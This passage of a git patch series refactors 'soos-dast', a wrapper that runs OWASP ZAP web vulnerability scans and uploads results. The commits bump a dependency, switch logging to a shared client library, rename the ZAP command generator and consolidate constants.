+        "@soos-io/api-client": "0.1.5-pre.6",
         "argparse": "^2.0.1",
         "axios": "^0.27.2",
         "tslib": "^2.6.2",
@@ -24,9 +24,9 @@
       }
     },
     "node_modules/@soos-io/api-client": {
-      "version": "0.1.5-pre.3",
-      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.3.tgz",
-      "integrity": "sha512-cTaszKtEquP3pfCb42jKr0HGFS6w0s8afbweAG2hcediWt3SBU3PELP7BMfTgBVITxCYvNukhqBPdSuUowqQKQ==",
+      "version": "0.1.5-pre.6",
+      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.6.tgz",
+      "integrity": "sha512-CxAsP0wIo8gqjTAF+dzIXRT7vvCfNwAl04MsY2orzXAvVfldSOftWEgB1S+7ssAsqwx7C0wQhb5W3r63VCiCLg==",
       "dependencies": {
         "axios": "^0.27.2",
         "tslib": "^2.6.2"
diff --git a/package.json b/package.json
index 4557d2e..eac629a 100644
--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "soos-dast",
-  "version": "1.0.0",
+  "version": "2.0.0",
   "description": "SOOS DAST - The affordable no limit web vulnerability scanner",
   "main": "index.js",
   "scripts": {
@@ -17,7 +17,7 @@
     "check": "npm run format && npm run typecheck && npm run test"
   },
   "dependencies": {
-    "@soos-io/api-client": "0.1.5-pre.4",
+    "@soos-io/api-client": "0.1.5-pre.6",
     "argparse": "^2.0.1",
     "axios": "^0.27.2",
     "tslib": "^2.6.2",
diff --git a/src/env.d.ts b/src/env.d.ts
deleted file mode 100644
index e6a4112..0000000
--- a/src/env.d.ts
+++ /dev/null
@@ -1,7 +0,0 @@
-import { Logger } from "./utils/Logger";
-
-declare global {
-  var logger: Logger;
-}
-
-export {};
diff --git a/src/index.ts b/src/index.ts
index 546bdf4..5742c6a 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -1,9 +1,7 @@
-import { ZapCommandGenerator } from "./utils/ZapCommandGenerator";
+import { ZAPCommandGenerator } from "./utils/ZAPCommandGenerator";
 import * as fs from "fs";
 import FormData from "form-data";
 import { spawn, execSync } from "child_process";
-import { Logger } from "./utils/Logger";
-import { convertStringToB64, getEnvVariable, isUrlAvailable } from "./utils/utilities";
 import {
   AUTH_DELAY_TIME,
   DAST_TOOL,
@@ -14,18 +12,15 @@ import {
   SPIDERED_URLS_FILE_PATH,
 } from "./utils/constants";
 import { ArgumentParser } from "argparse";
-import {
-  ApiScanFormat,
-  FormTypes,
-  LogLevel,
-  OnFailure,
-  OutputFormat,
-  ScanMode,
-  SubmitActions,
-} from "./utils/enums";
+import { ApiScanFormat, FormTypes, OnFailure, ScanMode, SubmitActions } from "./utils/enums";
 import { exit } from "process";
 import SOOSAnalysisApiClient from "@soos-io/api-client/dist/api/SOOSAnalysisApiClient";
-import { ScanStatus, ScanType, soosLogger } from "@soos-io/api-client";
+import {
+  getEnvVariable,
+  isUrlAvailable,
+  convertStringToB64,
+} from "@soos-io/api-client/dist/utilities";
+import { ScanStatus, ScanType, soosLogger, LogLevel, OutputFormat } from "@soos-io/api-client";
 
 export interface SOOSDASTAnalysisArgs {
   apiKey: string;
@@ -387,7 +382,7 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
-    logger.info("Parsing arguments");
+    soosLogger.info("Parsing arguments");
     return parser.parse_args();
   }
 
@@ -397,8 +392,8 @@ class SOOSDASTAnalysis {
     let analysisId: string | undefined;
     const soosApiClient = new SOOSAnalysisApiClient(this.args.apiKey, this.args.apiURL);
     try {
-      logger.info("Starting SOOS DAST Analysis");
-      logger.info(`Creating scan for project ${this.args.projectName}...`);
+      soosLogger.info("Starting SOOS DAST Analysis");
+      soosLogger.info(`Creating scan for project ${this.args.projectName}...`);
       const result = await soosApiClient.createScan({
         clientId: this.args.clientId,
         projectName: this.args.projectName,
@@ -421,9 +416,9 @@ class SOOSDASTAnalysis {
       branchHash = result.branchHash;
       analysisId = result.analysisId;
 
-      global.logger.info(`Checking if url '${this.args.targetURL}' is available...`);
+      soosLogger.info(`Checking if url '${this.args.targetURL}' is available...`);
       if (!(await isUrlAvailable(this.args.targetURL))) {
-        logger.error(`The URL ${this.args.targetURL} is not available.`);
+        soosLogger.error(`The URL ${this.args.targetURL} is not available.`);
         exit(1);
       }
 
@@ -437,12 +432,12 @@ class SOOSDASTAnalysis {
         execSync("cp -R /zap/reports/traditional-json /root/.ZAP/reports/traditional-json");
       }
 
-      const zapCommandGenerator = new ZapCommandGenerator(this.args);
+      const zapCommandGenerator = new ZAPCommandGenerator(this.args);
       const command = zapCommandGenerator.runCommandGeneration(this.args.scanMode);
-      logger.info(`Running command: ${command}`);
+      soosLogger.info(`Running command: ${command}`);
       await SOOSDASTAnalysis.runZap(command);
       const runSuccess = fs.existsSync(REPORT_SCAN_RESULT_FILE);
-      logger.info(`Scan finished with success: ${runSuccess}`);
+      soosLogger.info(`Scan finished with success: ${runSuccess}`);
 
       const discoveredUrls =
         fs.existsSync(SPIDERED_URLS_FILE_PATH) && fs.statSync(SPIDERED_URLS_FILE_PATH).isFile()
@@ -465,7 +460,7 @@ class SOOSDASTAnalysis {
         ),
         "base64Manifest"
       );
-      logger.info(`Uploading scan result for project ${this.args.projectName}...`);
+      soosLogger.info(`Uploading scan result for project ${this.args.projectName}...`);
       await soosApiClient.uploadScanToolResult({
         clientId: this.args.clientId,
         projectHash,
@@ -476,7 +471,7 @@ class SOOSDASTAnalysis {
       });
 
       if (this.args.outputFormat !== undefined) {
-        logger.info(`Generating SARIF report  ${this.args.projectName}...`);
+        soosLogger.info(`Generating SARIF report  ${this.args.projectName}...`);
         const output = await soosApiClient.getFormattedScanResult({
           clientId: this.args.clientId,
           projectHash,
@@ -486,8 +481,8 @@ class SOOSDASTAnalysis {
           outputFormat: this.args.outputFormat,
         });
         if (output) {
-          logger.info(`Output ('${this.args.outputFormat}' format):`);
-          logger.info(JSON.stringify(output, null, 2));
+          soosLogger.info(`Output ('${this.args.outputFormat}' format):`);
+          soosLogger.info(JSON.stringify(output, null, 2));
         }
       }
     } catch (error) {
@@ -501,7 +496,7 @@ class SOOSDASTAnalysis {
           status: ScanStatus.Error,
           message: `Error while performing scan.`,
         });
-      logger.error(error);
+      soosLogger.error(error);
       exit(1);
     }
   }
@@ -525,17 +520,14 @@ class SOOSDASTAnalysis {
   }
 
   static async createAndRun(): Promise<void> {
-    global.logger = new Logger();
     try {
       const args = this.parseArgs();
-      global.logger.setMinLogLevel(args.logLevel);
-      global.logger.setVerbose(args.verbose);
       soosLogger.setMinLogLevel(args.logLevel);
       soosLogger.setVerbose(args.verbose);
       const soosDASTAnalysis = new SOOSDASTAnalysis(args);
       await soosDASTAnalysis.runAnalysis();
     } catch (error) {
-      logger.error(`Error on createAndRun: ${error}`);
+      soosLogger.error(`Error on createAndRun: ${error}`);
       exit(1);
     }
   }
diff --git a/src/utils/Logger.ts b/src/utils/Logger.ts
deleted file mode 100644
index 13e89b2..0000000
--- a/src/utils/Logger.ts
+++ /dev/null
@@ -1,94 +0,0 @@
-import { LogLevel } from "./enums";
-
-export class Logger {
-  private verbose: boolean;
-  private console: Console;
-  private minLogLevel: LogLevel;
-
-  constructor(
-    verbose: boolean = false,
-    minLogLevel: LogLevel = LogLevel.INFO,
-    console: Console = global.console
-  ) {
-    this.verbose = verbose;
-    this.console = console;
-    this.minLogLevel = minLogLevel;
-  }
-
-  private getTimeStamp(): string {
-    const now = new Date();
-    const year = now.getFullYear();
-    const month = (now.getMonth() + 1).toString().padStart(2, "0");
-    const day = now.getDate().toString().padStart(2, "0");
-    const hours = now.getHours() % 12 || 12; // Convert to 12-hour format
-    const ampm = now.getHours() >= 12 ? "PM" : "AM";
-    const minutes = now.getMinutes().toString().padStart(2, "0");
-    const seconds = now.getSeconds().toString().padStart(2, "0");
-
-    const timestamp = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${ampm}`;
-
-    return `${timestamp}`;
-  }
-
-  private logWithTimestamp(level: LogLevel, message?: any, ...optionalParams: any[]): void {
-    if (level >= this.minLogLevel) {
-      const logLevelkey = LogLevel[level];
-      const timestamp = this.getTimeStamp();
-      const logMessage = `${timestamp} UTC [${logLevelkey}] ${message}`;
-      this.console.log(logMessage, ...optionalParams);
-    }
-  }
-
-  setVerbose(verbose: boolean) {
-    this.verbose = verbose;
-  }
-
-  setMinLogLevel(minLogLevel: LogLevel) {
-    this.minLogLevel = minLogLevel;
-  }
-
-  info(message?: any, ...optionalParams: any[]): void {
-    this.logWithTimestamp(LogLevel.INFO, message, ...optionalParams);
-  }
-
-  debug(message?: any, ...optionalParams: any[]): void {
-    this.logWithTimestamp(LogLevel.DEBUG, message, ...optionalParams);
-  }
-
-  warn(message?: any, ...optionalParams: any[]): void {
-    this.logWithTimestamp(LogLevel.WARN, message, ...optionalParams);
-  }
-
-  error(message?: any, ...optionalParams: any[]): void {
-    this.logWithTimestamp(LogLevel.ERROR, message, ...optionalParams);
-  }
-
-  verboseInfo(message?: any, ...optionalParams: any[]): void {
-    if (this.verbose) {
-      this.info(message, ...optionalParams);
-    }
-  }
-
-  verboseDebug(message?: any, ...optionalParams: any[]): void {
-    if (this.verbose) {
-      this.debug(message, ...optionalParams);
-    }
-  }
-
-  verboseWarn(message?: any, ...optionalParams: any[]): void {
-    if (this.verbose) {
-      this.warn(message, ...optionalParams);
-    }
-  }
-
-  verboseError(message?: any, ...optionalParams: any[]): void {
-    if (this.verbose) {
-      this.error(message, ...optionalParams);
-    }
-  }
-
-  logLineSeparator(): void {
-    const separator = "-".repeat(80);
-    this.console.log(separator);
-  }
-}
diff --git a/src/utils/ZapCommandGenerator.ts b/src/utils/ZapCommandGenerator.ts
deleted file mode 100644
index d08f6bb..0000000
--- a/src/utils/ZapCommandGenerator.ts
+++ /dev/null
@@ -1,99 +0,0 @@
-import { SOOSDASTAnalysisArgs } from "..";
-import {
-  API_SCAN_SCRIPT,
-  BASE_LINE_SCRIPT,
-  FULL_SCAN_SCRIPT,
-  PY_CMD,
-  REPORT_SCAN_RESULT_FILENAME,
-  ZAP_AJAX_SPIDER_OPTION,
-  ZAP_CONTEXT_FILE_OPTION,
-  ZAP_CUSTOM_HOOK_SCRIPT,
-  ZAP_DEBUG_OPTION,
-  ZAP_FORMAT_OPTION,
-  ZAP_HOOK_OPTION,
-  ZAP_JSON_REPORT_OPTION,
-  ZAP_OPTIONS,
-  ZAP_SPIDER_MINUTES_OPTION,
-  ZAP_TARGET_URL_OPTION,
-} from "./constants";
-import { ScanMode } from "./enums";
-
-export class ZapCommandGenerator {
-  constructor(private config: SOOSDASTAnalysisArgs) {}
-
-  private addOption(args: string[], option: string, value?: string | number | boolean) {
-    if (value) {
-      args.push(option);
-      if (typeof value !== "boolean") args.push(value.toString());
-    }
-  }
-
-  private addEnvironmentVariable(name: string, value: any) {
-    if (value !== undefined) {
-      process.env[name] = String(value);
-    }
-  }
-
-  private addHookParams() {
-    this.addEnvironmentVariable("AUTH_LOGIN_URL", this.config.authLoginURL);
-    this.addEnvironmentVariable("AUTH_USERNAME", this.config.authUsername);
-    this.addEnvironmentVariable("AUTH_PASSWORD", this.config.authPassword);
-    this.addEnvironmentVariable("CUSTOM_COOKIES", this.config.requestCookies);
-    this.addEnvironmentVariable("CUSTOM_HEADER", this.config.requestHeaders);
-    this.addEnvironmentVariable("AUTH_BEARER_TOKEN", this.config.bearerToken);
-    this.addEnvironmentVariable("AUTH_SUBMIT_FIELD", this.config.authSubmitField);
-    this.addEnvironmentVariable("AUTH_SECOND_SUBMIT_FIELD", this.config.authSecondSubmitField);
-    this.addEnvironmentVariable("AUTH_SUBMIT_ACTION", this.config.authSubmitAction);
-    this.addEnvironmentVariable("AUTH_FORM_TYPE", this.config.authFormType);
-    this.addEnvironmentVariable("AUTH_DELAY_TIME", this.config.authDelayTime);
-    this.addEnvironmentVariable("AUTH_VERIFICATION_URL", this.config.authVerificationURL);
-    this.addEnvironmentVariable("AUTH_USERNAME_FIELD", this.config.authUsernameField);
-    this.addEnvironmentVariable("AUTH_PASSWORD_FIELD", this.config.authPasswordField);
-    this.addEnvironmentVariable("OAUTH_TOKEN_URL", this.config.oauthTokenUrl);
-    this.addEnvironmentVariable("OAUTH_PARAMETERS", this.config.oauthParameters);
-    this.addEnvironmentVariable("DISABLE_RULES", this.config.disableRules);
-  }
-
-  private generateCommand(args: string[]): string {
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
-    this.addOption(args, ZAP_CONTEXT_FILE_OPTION, this.config.contextFile);
-    this.addOption(args, ZAP_DEBUG_OPTION, this.config.debug);
-    this.addOption(args, ZAP_AJAX_SPIDER_OPTION, this.config.ajaxSpider);
-    this.addOption(args, ZAP_SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
-    this.addOption(args, ZAP_JSON_REPORT_OPTION, REPORT_SCAN_RESULT_FILENAME);
-    this.addOption(args, ZAP_OPTIONS, this.config.otherOptions);
-    this.addOption(args, ZAP_HOOK_OPTION, ZAP_CUSTOM_HOOK_SCRIPT);
-    this.addHookParams();
-
-    return args.join(" ");
-  }
-
-  private baselineScan(): string {
-    const args = [PY_CMD, BASE_LINE_SCRIPT];
-    return this.generateCommand(args);
-  }
-
-  private fullScan(): string {
-    const args = [PY_CMD, FULL_SCAN_SCRIPT];
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
-    return this.generateCommand(args);
-  }
-
-  private apiScan(): string {
-    const args = [PY_CMD, API_SCAN_SCRIPT];
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
-    this.addOption(args, ZAP_FORMAT_OPTION, this.config.apiScanFormat);
-    return this.generateCommand(args);
-  }
-
-  public runCommandGeneration(mode: ScanMode): string {
-    switch (mode) {
-      case ScanMode.Baseline:
-        return this.baselineScan();
-      case ScanMode.FullScan:
-        return this.fullScan();
-      case ScanMode.ApiScan:
-        return this.apiScan();
-    }
-  }
-}
diff --git a/src/utils/constants.ts b/src/utils/constants.ts
index b0ad7f2..58e75a9 100644
--- a/src/utils/constants.ts
+++ b/src/utils/constants.ts
@@ -1,4 +1,3 @@
-export const FILE_ENCODING = "utf8";
 export const SOOS_API_KEY_ENV_VAR = "SOOS_API_KEY";
 export const SOOS_CLIENT_ID_ENV_VAR = "SOOS_CLIENT_ID";
 export const AUTH_DELAY_TIME = 5;
diff --git a/src/utils/enums.ts b/src/utils/enums.ts
index 4007b07..37c0449 100644
--- a/src/utils/enums.ts
+++ b/src/utils/enums.ts
@@ -10,20 +10,6 @@ export enum ApiScanFormat {
   GraphQL = "GraphQL",
 }
 
-export enum LogLevel {
-  PASS = 0,
-  IGNORE = 1,
-  INFO = 2,
-  WARN = 3,
-  FAIL = 4,
-  DEBUG = 5,
-  ERROR = 6,
-}
-
-export enum OutputFormat {
-  SARIF = "SARIF",
-}
-
 export enum SubmitActions {
   Submit = "submit",
   Click = "click",
diff --git a/src/utils/utilities.ts b/src/utils/utilities.ts
deleted file mode 100644
index 187e75a..0000000
--- a/src/utils/utilities.ts
+++ /dev/null
@@ -1,109 +0,0 @@
-import axios, { AxiosError } from "axios";
-
-export function isNil(value: unknown): value is null | undefined {
-  return value === null || value === undefined;
-}
-export function convertStringToB64(content: string): string {
-  const messageBytes = Buffer.from(content, "utf-8");
-  const base64Message = messageBytes.toString("base64");
-  return base64Message;
-}
-
-export function delay(ms: number) {
-  return new Promise((resolve) => setTimeout(resolve, ms));
-}
-
-export const removeDuplicates = <T>(list: Array<T>): Array<T> => [...new Set(list)];
-
-export const ensureValue = <T>(value: T | null | undefined, propertyName: string): T => {
-  if (isNil(value)) throw new Error(`'${propertyName}' is required for script execution.`);
-  return value;
-};
-
-export const ensureValueIsOneOf = <T extends string>(
-  options: Array<T>,
-  value: string | undefined,
-  opts: { caseSensitive?: boolean } = {}
-): T | undefined => {
-  if (value === undefined) return undefined;
-  const match = options.find((option) => {
-    return opts.caseSensitive
-      ? option === value
-      : option.toLocaleLowerCase() === value.toLocaleLowerCase();
-  });
-  if (!isNil(match)) return match;
-  throw new Error(`Invalid enum value '${value}'. Valid options are: ${options.join(", ")}.`);
-};
-
-export const ensureEnumValue = <
-  T extends string,
-  TEnumObject extends Record<string, T> = Record<string, T>
->(
-  enumObject: TEnumObject,
-  value: string | undefined
-): T | undefined => {
-  return ensureValueIsOneOf(Object.values(enumObject), value);
-};
-
-/*
-Reference: https://stackoverflow.com/a/18650828
-*/
-export function formatBytes(bytes: number, decimals = 2) {
-  if (bytes === 0) return "0 Bytes";
-
-  const kilobyte = 1024;
-  const fractionalDigits = decimals < 0 ? 0 : decimals;
-  const sizes = ["Bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"];
-
-  const exponentialValue = Math.floor(Math.log(bytes) / Math.log(kilobyte));
-  const count = Number.parseFloat(
-    (bytes / Math.pow(kilobyte, exponentialValue)).toFixed(fractionalDigits)
-  );
-  const unit = sizes[exponentialValue];
-  return `${count} ${unit}`;
-}
-
-export const obfuscateProperties = <T extends Record<string, unknown> = Record<string, unknown>>(
-  dictionary: T,
-  properties: Array<keyof T>,
-  replacement = "*********"
-) => {
-  return Object.entries(dictionary).reduce<T>((accumulator, [key, value]) => {
-    return {
-      ...accumulator,
-      [key]: properties.includes(key) ? replacement : value,
-    };
-  }, {} as T);
-};
-
-export const getEnvVariable = (name: string): string | null => {
-  return process.env[name] || null;
-};
-
-export const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms));
-
-export const isUrlAvailable = async (url: string): Promise<boolean> => {
-  let delay = 5000;
-  let maxAttempts = 5;
-  let attempts = 0;
-  while (attempts < maxAttempts) {
-    try {
-      logger.info(`Attempt ${attempts + 1} of ${maxAttempts}...`);
-      const response = await axios.get(url);
-      if (response.status >= 200 && response.status < 300) {
-        return true;
-      }
-    } catch (error) {
-      if (error instanceof AxiosError) {
-        logger.info(error);
-        if (error.response && error.response.status < 500) {
-          return true;
-        }
-      }
-      attempts++;
-      if (attempts < maxAttempts) await sleep(delay);
-    }
-  }
-
-  return false;
-};

From 836e78953650f1f92eb845ccf2797def826ed2f6 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 09:25:26 -0300
Subject: [PATCH 03/26] added zap command generator back with uppercase

---
 src/utils/ZAPCommandGenerator.ts | 99 ++++++++++++++++++++++++++++++++
 1 file changed, 99 insertions(+)
 create mode 100644 src/utils/ZAPCommandGenerator.ts

diff --git a/src/utils/ZAPCommandGenerator.ts b/src/utils/ZAPCommandGenerator.ts
new file mode 100644
index 0000000..0df24f3
--- /dev/null
+++ b/src/utils/ZAPCommandGenerator.ts
@@ -0,0 +1,99 @@
+import { SOOSDASTAnalysisArgs } from "..";
+import {
+  API_SCAN_SCRIPT,
+  BASE_LINE_SCRIPT,
+  FULL_SCAN_SCRIPT,
+  PY_CMD,
+  REPORT_SCAN_RESULT_FILENAME,
+  ZAP_AJAX_SPIDER_OPTION,
+  ZAP_CONTEXT_FILE_OPTION,
+  ZAP_CUSTOM_HOOK_SCRIPT,
+  ZAP_DEBUG_OPTION,
+  ZAP_FORMAT_OPTION,
+  ZAP_HOOK_OPTION,
+  ZAP_JSON_REPORT_OPTION,
+  ZAP_OPTIONS,
+  ZAP_SPIDER_MINUTES_OPTION,
+  ZAP_TARGET_URL_OPTION,
+} from "./constants";
+import { ScanMode } from "./enums";
+
+export class ZAPCommandGenerator {
+  constructor(private config: SOOSDASTAnalysisArgs) {}
+
+  private addOption(args: string[], option: string, value?: string | number | boolean) {
+    if (value) {
+      args.push(option);
+      if (typeof value !== "boolean") args.push(value.toString());
+    }
+  }
+
+  private addEnvironmentVariable(name: string, value: any) {
+    if (value !== undefined) {
+      process.env[name] = String(value);
+    }
+  }
+
+  private addHookParams() {
+    this.addEnvironmentVariable("AUTH_LOGIN_URL", this.config.authLoginURL);
+    this.addEnvironmentVariable("AUTH_USERNAME", this.config.authUsername);
+    this.addEnvironmentVariable("AUTH_PASSWORD", this.config.authPassword);
+    this.addEnvironmentVariable("CUSTOM_COOKIES", this.config.requestCookies);
+    this.addEnvironmentVariable("CUSTOM_HEADER", this.config.requestHeaders);
+    this.addEnvironmentVariable("AUTH_BEARER_TOKEN", this.config.bearerToken);
+    this.addEnvironmentVariable("AUTH_SUBMIT_FIELD", this.config.authSubmitField);
+    this.addEnvironmentVariable("AUTH_SECOND_SUBMIT_FIELD", this.config.authSecondSubmitField);
+    this.addEnvironmentVariable("AUTH_SUBMIT_ACTION", this.config.authSubmitAction);
+    this.addEnvironmentVariable("AUTH_FORM_TYPE", this.config.authFormType);
+    this.addEnvironmentVariable("AUTH_DELAY_TIME", this.config.authDelayTime);
+    this.addEnvironmentVariable("AUTH_VERIFICATION_URL", this.config.authVerificationURL);
+    this.addEnvironmentVariable("AUTH_USERNAME_FIELD", this.config.authUsernameField);
+    this.addEnvironmentVariable("AUTH_PASSWORD_FIELD", this.config.authPasswordField);
+    this.addEnvironmentVariable("OAUTH_TOKEN_URL", this.config.oauthTokenUrl);
+    this.addEnvironmentVariable("OAUTH_PARAMETERS", this.config.oauthParameters);
+    this.addEnvironmentVariable("DISABLE_RULES", this.config.disableRules);
+  }
+
+  private generateCommand(args: string[]): string {
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, ZAP_CONTEXT_FILE_OPTION, this.config.contextFile);
+    this.addOption(args, ZAP_DEBUG_OPTION, this.config.debug);
+    this.addOption(args, ZAP_AJAX_SPIDER_OPTION, this.config.ajaxSpider);
+    this.addOption(args, ZAP_SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
+    this.addOption(args, ZAP_JSON_REPORT_OPTION, REPORT_SCAN_RESULT_FILENAME);
+    this.addOption(args, ZAP_OPTIONS, this.config.otherOptions);
+    this.addOption(args, ZAP_HOOK_OPTION, ZAP_CUSTOM_HOOK_SCRIPT);
+    this.addHookParams();
+
+    return args.join(" ");
+  }
+
+  private baselineScan(): string {
+    const args = [PY_CMD, BASE_LINE_SCRIPT];
+    return this.generateCommand(args);
+  }
+
+  private fullScan(): string {
+    const args = [PY_CMD, FULL_SCAN_SCRIPT];
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    return this.generateCommand(args);
+  }
+
+  private apiScan(): string {
+    const args = [PY_CMD, API_SCAN_SCRIPT];
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, ZAP_FORMAT_OPTION, this.config.apiScanFormat);
+    return this.generateCommand(args);
+  }
+
+  public runCommandGeneration(mode: ScanMode): string {
+    switch (mode) {
+      case ScanMode.Baseline:
+        return this.baselineScan();
+      case ScanMode.FullScan:
+        return this.fullScan();
+      case ScanMode.ApiScan:
+        return this.apiScan();
+    }
+  }
+}

From e65ade04dfd910a7857c1997f41eb1610a35fe8c Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 09:38:51 -0300
Subject: [PATCH 04/26] switch to barrel pattern for utilities, rework
 constants

---
 src/index.ts                     | 36 +++++++---------
 src/utils/ZAPCommandGenerator.ts | 50 +++++++++--------------
 src/utils/constants.ts           | 70 +++++++++++++++++++-------------
 src/utils/index.ts               |  3 ++
 4 files changed, 78 insertions(+), 81 deletions(-)
 create mode 100644 src/utils/index.ts

diff --git a/src/index.ts b/src/index.ts
index 5742c6a..e6e4c4e 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -1,16 +1,6 @@
-import { ZAPCommandGenerator } from "./utils/ZAPCommandGenerator";
 import * as fs from "fs";
 import FormData from "form-data";
 import { spawn, execSync } from "child_process";
-import {
-  AUTH_DELAY_TIME,
-  DAST_TOOL,
-  DAST_TOOL_VERSION,
-  REPORT_SCAN_RESULT_FILE,
-  SOOS_API_KEY_ENV_VAR,
-  SOOS_CLIENT_ID_ENV_VAR,
-  SPIDERED_URLS_FILE_PATH,
-} from "./utils/constants";
 import { ArgumentParser } from "argparse";
 import { ApiScanFormat, FormTypes, OnFailure, ScanMode, SubmitActions } from "./utils/enums";
 import { exit } from "process";
@@ -21,6 +11,7 @@ import {
   convertStringToB64,
 } from "@soos-io/api-client/dist/utilities";
 import { ScanStatus, ScanType, soosLogger, LogLevel, OutputFormat } from "@soos-io/api-client";
+import { ZAPCommandGenerator, CONSTANTS } from "./utils";
 
 export interface SOOSDASTAnalysisArgs {
   apiKey: string;
@@ -82,13 +73,13 @@ class SOOSDASTAnalysis {
 
     parser.add_argument("--clientId", {
       help: "SOOS Client ID - get yours from https://app.soos.io/integrate/sca",
-      default: getEnvVariable(SOOS_CLIENT_ID_ENV_VAR),
+      default: getEnvVariable(CONSTANTS.SOOS.CLIENT_ID_ENV_VAR),
       required: false,
     });
 
     parser.add_argument("--apiKey", {
       help: "SOOS API Key - get yours from https://app.soos.io/integrate/sca",
-      default: getEnvVariable(SOOS_API_KEY_ENV_VAR),
+      default: getEnvVariable(CONSTANTS.SOOS.API_KEY_ENV_VAR),
       required: false,
     });
 
@@ -215,7 +206,7 @@ class SOOSDASTAnalysis {
 
     parser.add_argument("--authDelayTime", {
       help: "Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page)",
-      default: AUTH_DELAY_TIME,
+      default: CONSTANTS.AUTH.DELAY_TIME,
       required: false,
     });
 
@@ -409,8 +400,8 @@ class SOOSDASTAnalysis {
         scriptVersion: null,
         contributingDeveloperAudit: undefined,
         scanType: ScanType.DAST,
-        toolName: DAST_TOOL,
-        toolVersion: DAST_TOOL_VERSION,
+        toolName: CONSTANTS.DAST.TOOL,
+        toolVersion: CONSTANTS.DAST.TOOL_VERSION,
       });
       projectHash = result.projectHash;
       branchHash = result.branchHash;
@@ -436,27 +427,30 @@ class SOOSDASTAnalysis {
       const command = zapCommandGenerator.runCommandGeneration(this.args.scanMode);
       soosLogger.info(`Running command: ${command}`);
       await SOOSDASTAnalysis.runZap(command);
-      const runSuccess = fs.existsSync(REPORT_SCAN_RESULT_FILE);
+      const runSuccess = fs.existsSync(CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE);
       soosLogger.info(`Scan finished with success: ${runSuccess}`);
 
       const discoveredUrls =
-        fs.existsSync(SPIDERED_URLS_FILE_PATH) && fs.statSync(SPIDERED_URLS_FILE_PATH).isFile()
+        fs.existsSync(CONSTANTS.FILES.SPIDERED_URLS_FILE_PATH) &&
+        fs.statSync(CONSTANTS.FILES.SPIDERED_URLS_FILE_PATH).isFile()
           ? fs
-              .readFileSync(SPIDERED_URLS_FILE_PATH, "utf-8")
+              .readFileSync(CONSTANTS.FILES.SPIDERED_URLS_FILE_PATH, "utf-8")
               .split("\n")
               .filter((url) => url.trim() !== "")
           : [];
 
-      const data = JSON.parse(fs.readFileSync(REPORT_SCAN_RESULT_FILE, "utf-8"));
+      const data = JSON.parse(fs.readFileSync(CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE, "utf-8"));
       data["discoveredUrls"] = discoveredUrls;
-      fs.writeFileSync(REPORT_SCAN_RESULT_FILE, JSON.stringify(data, null, 4));
+      fs.writeFileSync(CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE, JSON.stringify(data, null, 4));
       const formData = new FormData();
 
       formData.append("resultVersion", data["@version"]);
       formData.append(
         "file",
         convertStringToB64(
-          JSON.stringify(JSON.parse(fs.readFileSync(REPORT_SCAN_RESULT_FILE, "utf-8")))
+          JSON.stringify(
+            JSON.parse(fs.readFileSync(CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE, "utf-8"))
+          )
         ),
         "base64Manifest"
       );
diff --git a/src/utils/ZAPCommandGenerator.ts b/src/utils/ZAPCommandGenerator.ts
index 0df24f3..52e42e3 100644
--- a/src/utils/ZAPCommandGenerator.ts
+++ b/src/utils/ZAPCommandGenerator.ts
@@ -1,21 +1,5 @@
 import { SOOSDASTAnalysisArgs } from "..";
-import {
-  API_SCAN_SCRIPT,
-  BASE_LINE_SCRIPT,
-  FULL_SCAN_SCRIPT,
-  PY_CMD,
-  REPORT_SCAN_RESULT_FILENAME,
-  ZAP_AJAX_SPIDER_OPTION,
-  ZAP_CONTEXT_FILE_OPTION,
-  ZAP_CUSTOM_HOOK_SCRIPT,
-  ZAP_DEBUG_OPTION,
-  ZAP_FORMAT_OPTION,
-  ZAP_HOOK_OPTION,
-  ZAP_JSON_REPORT_OPTION,
-  ZAP_OPTIONS,
-  ZAP_SPIDER_MINUTES_OPTION,
-  ZAP_TARGET_URL_OPTION,
-} from "./constants";
+import { CONSTANTS } from "./constants";
 import { ScanMode } from "./enums";
 
 export class ZAPCommandGenerator {
@@ -55,34 +39,38 @@ export class ZAPCommandGenerator {
   }
 
   private generateCommand(args: string[]): string {
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
-    this.addOption(args, ZAP_CONTEXT_FILE_OPTION, this.config.contextFile);
-    this.addOption(args, ZAP_DEBUG_OPTION, this.config.debug);
-    this.addOption(args, ZAP_AJAX_SPIDER_OPTION, this.config.ajaxSpider);
-    this.addOption(args, ZAP_SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
-    this.addOption(args, ZAP_JSON_REPORT_OPTION, REPORT_SCAN_RESULT_FILENAME);
-    this.addOption(args, ZAP_OPTIONS, this.config.otherOptions);
-    this.addOption(args, ZAP_HOOK_OPTION, ZAP_CUSTOM_HOOK_SCRIPT);
+    this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, CONSTANTS.ZAP.CONTEXT_FILE_OPTION, this.config.contextFile);
